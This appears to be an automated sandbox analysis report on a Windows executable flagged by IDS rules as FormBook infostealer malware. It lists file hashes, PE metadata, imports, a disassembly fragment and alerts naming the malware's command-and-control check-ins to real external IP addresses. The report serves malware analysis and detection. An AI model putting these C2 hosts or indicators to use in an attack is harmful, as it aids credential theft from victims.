                                                                      SHA-512:2DA2C70C5FF4060FB4034ADE83F8167F4EC51C24D80CCEF9E42C250BB1F510C5758D51E6C6145252610491933903E0881FF49B75E42BC09A70A3F9E4B8BB43B0
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:...C152G4QQ8..FT.P5BF05M.4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BK.T9P;].>5.A.b.4~...9Q1k6&V7G#+.V,&Z,F.P".#$Vb"(t}.fb+_Q(f9N8.2G0QQ8B2G].mU%..U*..#U.(.kX%.\.."!./....RR..Y29.",.T9P5BF05..4C~43G.c.eBKFT9P5B.07LC5H25`C0QQ8BKFT9.!BF0%MH43652GpQQ(BKFV9P3BF05MH4E252G0QQ82OFT;P5BF05OHt.25"G0AQ8BKVT9@5BF05MX4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P.6#HAMH4gb12G QQ8.OFT)P5BF05MH4C252G.QQXBKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ
                                                                      Process:C:\Users\user\Desktop\A2028041200SD.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):287744
                                                                      Entropy (8bit):7.994548369199958
                                                                      Encrypted:true
                                                                      SSDEEP:6144:5hxWvSxwYVGnPlNYkHrQLjnJHfg1KtQUJ3+UDR5tcTkXt7rkV9:Dy/Y8PlNYkHrINo1aQUJ3vl5tcgXt7rq
                                                                      MD5:292E198398B4804ED9B1225A460B6E95
                                                                      SHA1:EF119638F6151A1A4B7B0A6DF96817C8CCD2647B
                                                                      SHA-256:068B8518B839676C57BA3CC4D14C41BBA20BED264781472AA4AE7922A0B67957
                                                                      SHA-512:2DA2C70C5FF4060FB4034ADE83F8167F4EC51C24D80CCEF9E42C250BB1F510C5758D51E6C6145252610491933903E0881FF49B75E42BC09A70A3F9E4B8BB43B0
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:...C152G4QQ8..FT.P5BF05M.4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BK.T9P;].>5.A.b.4~...9Q1k6&V7G#+.V,&Z,F.P".#$Vb"(t}.fb+_Q(f9N8.2G0QQ8B2G].mU%..U*..#U.(.kX%.\.."!./....RR..Y29.",.T9P5BF05..4C~43G.c.eBKFT9P5B.07LC5H25`C0QQ8BKFT9.!BF0%MH43652GpQQ(BKFV9P3BF05MH4E252G0QQ82OFT;P5BF05OHt.25"G0AQ8BKVT9@5BF05MX4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P.6#HAMH4gb12G QQ8.OFT)P5BF05MH4C252G.QQXBKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.147203930434446
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:A2028041200SD.exe
                                                                      File size:1'214'464 bytes
                                                                      MD5:65a28cddb97884a94a7c9faef74300c3
                                                                      SHA1:8cdb55cfbf3b463246bfea5ef3b8e3de34c64149
                                                                      SHA256:78ccda9ce77fc7adb68fac21cc8019dbdc10fadd481f28f28e0428eb35828fbf
                                                                      SHA512:6085a372018483ccdb19b825c1f9bd378d5cfbd0de6312f64bd1746ddd186a392330721d25746cce1ed26ab1c746f50db5fd5b81584644978312936070ecd2b4
                                                                      SSDEEP:24576:Ttb20pkaCqT5TBWgNQ7aHkf45YUptDT0n5pe86A:QVg5tQ7aHkfdUbW5pf5
                                                                      TLSH:3F45CF2273DEC365C3B25273BA16B701BE7B782506A5F96B2FD4093DE820161521EB73
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                      Icon Hash:aaf3e3e3938382a0
                                                                      Entrypoint:0x425f74
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x673D6E68 [Wed Nov 20 05:06:48 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:1
                                                                      File Version Major:5
                                                                      File Version Minor:1
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:1
                                                                      Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                      Instruction
                                                                      call 00007FD60CE6532Fh
                                                                      jmp 00007FD60CE58344h
                                                                      int3
                                                                      int3
                                                                      push edi
                                                                      push esi
                                                                      mov esi, dword ptr [esp+10h]
                                                                      mov ecx, dword ptr [esp+14h]
                                                                      mov edi, dword ptr [esp+0Ch]
                                                                      mov eax, ecx
                                                                      mov edx, ecx
                                                                      add eax, esi
                                                                      cmp edi, esi
                                                                      jbe 00007FD60CE584CAh
                                                                      cmp edi, eax
                                                                      jc 00007FD60CE5882Eh
                                                                      bt dword ptr [004C0158h], 01h
                                                                      jnc 00007FD60CE584C9h
                                                                      rep movsb
                                                                      jmp 00007FD60CE587DCh
                                                                      cmp ecx, 00000080h
                                                                      jc 00007FD60CE58694h
                                                                      mov eax, edi
                                                                      xor eax, esi
                                                                      test eax, 0000000Fh
                                                                      jne 00007FD60CE584D0h
                                                                      bt dword ptr [004BA370h], 01h
                                                                      jc 00007FD60CE589A0h
                                                                      bt dword ptr [004C0158h], 00000000h
                                                                      jnc 00007FD60CE5866Dh
                                                                      test edi, 00000003h
                                                                      jne 00007FD60CE5867Eh
                                                                      test esi, 00000003h
                                                                      jne 00007FD60CE5865Dh
                                                                      bt edi, 02h
                                                                      jnc 00007FD60CE584CFh
                                                                      mov eax, dword ptr [esi]
                                                                      sub ecx, 04h
                                                                      lea esi, dword ptr [esi+04h]
                                                                      mov dword ptr [edi], eax
                                                                      lea edi, dword ptr [edi+04h]
                                                                      bt edi, 03h
                                                                      jnc 00007FD60CE584D3h
                                                                      movq xmm1, qword ptr [esi]
                                                                      sub ecx, 08h
                                                                      lea esi, dword ptr [esi+08h]
                                                                      movq qword ptr [edi], xmm1
                                                                      lea edi, dword ptr [edi+08h]
                                                                      test esi, 00000007h
                                                                      je 00007FD60CE58525h
                                                                      bt esi, 03h
                                                                      jnc 00007FD60CE58578h
                                                                      movdqa xmm1, dqword ptr [esi+00h]
                                                                      Programming Language:
                                                                      • [ C ] VS2008 SP1 build 30729
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [ASM] VS2012 UPD4 build 61030
                                                                      • [RES] VS2012 UPD4 build 61030
                                                                      • [LNK] VS2012 UPD4 build 61030
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5f6ec.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x6c4c.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0xc40000x5f6ec0x5f80035355c9f0a2e0e4aba481b68e3d27ca9False0.9309171506871727data7.901774946740865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x1240000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                      RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                      RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                      RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                      RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                      RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                      RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                      RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                      RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                      RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                      RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                      RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                      RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                      RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                      RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                      RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                      RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                      RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                      RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                      RT_RCDATA0xcc7b80x569f1data1.0003269438361222
                                                                      RT_GROUP_ICON0x1231ac0x76dataEnglishGreat Britain0.6610169491525424
                                                                      RT_GROUP_ICON0x1232240x14dataEnglishGreat Britain1.25
                                                                      RT_GROUP_ICON0x1232380x14dataEnglishGreat Britain1.15
                                                                      RT_GROUP_ICON0x12324c0x14dataEnglishGreat Britain1.25
                                                                      RT_VERSION0x1232600xdcdataEnglishGreat Britain0.6181818181818182
                                                                      RT_MANIFEST0x12333c0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                                      DLLImport
                                                                      WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                      COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                      USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                      UxTheme.dllIsThemeActive
                                                                      KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                      USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                      GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                      ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                      OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishGreat Britain
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-20T09:22:55.944955+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049847188.114.97.380TCP
                                                                      2024-11-20T09:22:55.944955+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049847188.114.97.380TCP
                                                                      2024-11-20T09:23:13.101182+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104996123.167.152.4180TCP
                                                                      2024-11-20T09:23:15.654759+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104997723.167.152.4180TCP
                                                                      2024-11-20T09:23:18.201777+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104997823.167.152.4180TCP
                                                                      2024-11-20T09:23:20.756097+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104997923.167.152.4180TCP
                                                                      2024-11-20T09:23:20.756097+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104997923.167.152.4180TCP
                                                                      2024-11-20T09:23:26.444406+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998166.29.132.19480TCP
                                                                      2024-11-20T09:23:28.978112+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998266.29.132.19480TCP
                                                                      2024-11-20T09:23:31.531235+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998366.29.132.19480TCP
                                                                      2024-11-20T09:23:34.156224+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104998466.29.132.19480TCP
                                                                      2024-11-20T09:23:34.156224+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104998466.29.132.19480TCP
                                                                      2024-11-20T09:23:40.822235+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049985202.92.5.2380TCP
                                                                      2024-11-20T09:23:43.375631+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049986202.92.5.2380TCP
                                                                      2024-11-20T09:23:45.900366+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049987202.92.5.2380TCP
                                                                      2024-11-20T09:23:48.479087+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049988202.92.5.2380TCP
                                                                      2024-11-20T09:23:48.479087+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049988202.92.5.2380TCP
                                                                      2024-11-20T09:23:54.162947+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049989194.195.220.4180TCP
                                                                      2024-11-20T09:23:56.721604+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049990194.195.220.4180TCP
                                                                      2024-11-20T09:23:59.262057+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049991194.195.220.4180TCP
                                                                      2024-11-20T09:24:01.854135+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049992194.195.220.4180TCP
                                                                      2024-11-20T09:24:01.854135+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049992194.195.220.4180TCP
                                                                      2024-11-20T09:24:08.523389+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049993103.230.159.8680TCP
                                                                      2024-11-20T09:24:11.079279+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049994103.230.159.8680TCP
                                                                      2024-11-20T09:24:13.633467+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049995103.230.159.8680TCP
                                                                      2024-11-20T09:24:16.165792+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049996103.230.159.8680TCP
                                                                      2024-11-20T09:24:16.165792+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049996103.230.159.8680TCP
                                                                      2024-11-20T09:24:21.911913+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049997188.114.97.380TCP
                                                                      2024-11-20T09:24:24.418705+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049998188.114.97.380TCP
                                                                      2024-11-20T09:24:26.987576+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049999188.114.97.380TCP
                                                                      2024-11-20T09:24:29.562489+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050000188.114.97.380TCP
                                                                      2024-11-20T09:24:29.562489+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050000188.114.97.380TCP
                                                                      2024-11-20T09:24:35.861836+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050001118.107.250.10380TCP
                                                                      2024-11-20T09:24:38.486167+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050002118.107.250.10380TCP
                                                                      2024-11-20T09:24:41.033463+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050003118.107.250.10380TCP
                                                                      2024-11-20T09:24:43.602677+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050004118.107.250.10380TCP
